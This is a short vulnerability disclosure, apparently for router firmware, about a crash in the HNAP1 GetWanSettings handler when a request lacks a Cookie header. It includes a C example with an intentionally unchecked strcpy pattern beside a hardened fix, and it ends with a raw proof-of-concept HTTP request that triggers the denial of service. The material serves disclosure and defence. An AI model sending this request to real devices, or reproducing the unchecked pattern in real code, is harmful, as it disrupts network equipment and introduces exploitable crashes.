Overview

Vulnerability Details

The function sub_4484A8() handles HNAP1/GetWanSettings requests. It calls sub_45B5B8() to perform an authentication-related operation and then passes the return value (v98) to strcpy(). However, when the HTTP headers do not contain a Cookie, sub_45B5B8() returns a NULL pointer, and passing a NULL pointer to strcpy() crashes the server.

This allows an authorized attacker to perform a DoS attack.
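
The unchecked pattern described above, next to a hardened form, as an added example that is not the firmware's code. The names find_cookie() (standing in for sub_45B5B8()), copy_cookie_unchecked() and copy_cookie_checked() are hypothetical, and the sample requests are constructed.

```c
#include <stdio.h>
#include <string.h>
/* Constructed sample requests (headers only); the second has no Cookie. */
const char REQ_WITH_COOKIE[] = "POST /HNAP1/ HTTP/1.1\r\nCookie: uid=constructed\r\n\r\n";
const char REQ_NO_COOKIE[] = "POST /HNAP1/ HTTP/1.1\r\nContent-Length: 303\r\n\r\n";

/* Hypothetical stand-in for sub_45B5B8(): returns a pointer to the start of the
 * Cookie value, or NULL when no Cookie header exists (case-sensitive match). */
const char *find_cookie(const char *headers)
{
    const char *line = headers;
    while (line && *line && strncmp(line, "\r\n", 2) != 0) {
        if (strncmp(line, "Cookie: ", 8) == 0)
            return line + 8;
        line = strstr(line, "\r\n");
        if (line)
            line += 2;
    }
    return NULL;
}

/* Pattern from the advisory: the result goes to strcpy() unchecked, so a
 * request without a Cookie header dereferences NULL. Never called here. */
void copy_cookie_unchecked(char *dst, const char *headers)
{
    strcpy(dst, find_cookie(headers));
}

/* Hardened form: returns 0 on success, -1 if the Cookie is missing or too
 * long, so the handler can reject the request instead of crashing. */
int copy_cookie_checked(char *dst, size_t dst_len, const char *headers)
{
    const char *value = find_cookie(headers);
    if (value == NULL || dst == NULL || dst_len == 0)
        return -1;
    size_t len = strcspn(value, "\r\n");
    if (len >= dst_len)
        return -1;
    memcpy(dst, value, len);
    dst[len] = '\0';
    return 0;
}

int main(void)
{
    char buf[64];
    printf("with cookie: %d\n", copy_cookie_checked(buf, sizeof buf, REQ_WITH_COOKIE));
    printf("no cookie:   %d\n", copy_cookie_checked(buf, sizeof buf, REQ_NO_COOKIE));
    return 0;
}
```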

POC

b'POST /HNAP1/ HTTP/1.1\r\nContent-Length: 303\r\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\r\nSOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetWanSettings xmlns="http://purenetworks.com/HNAP1/" /></soap:Body></soap:Envelope>\r\n'
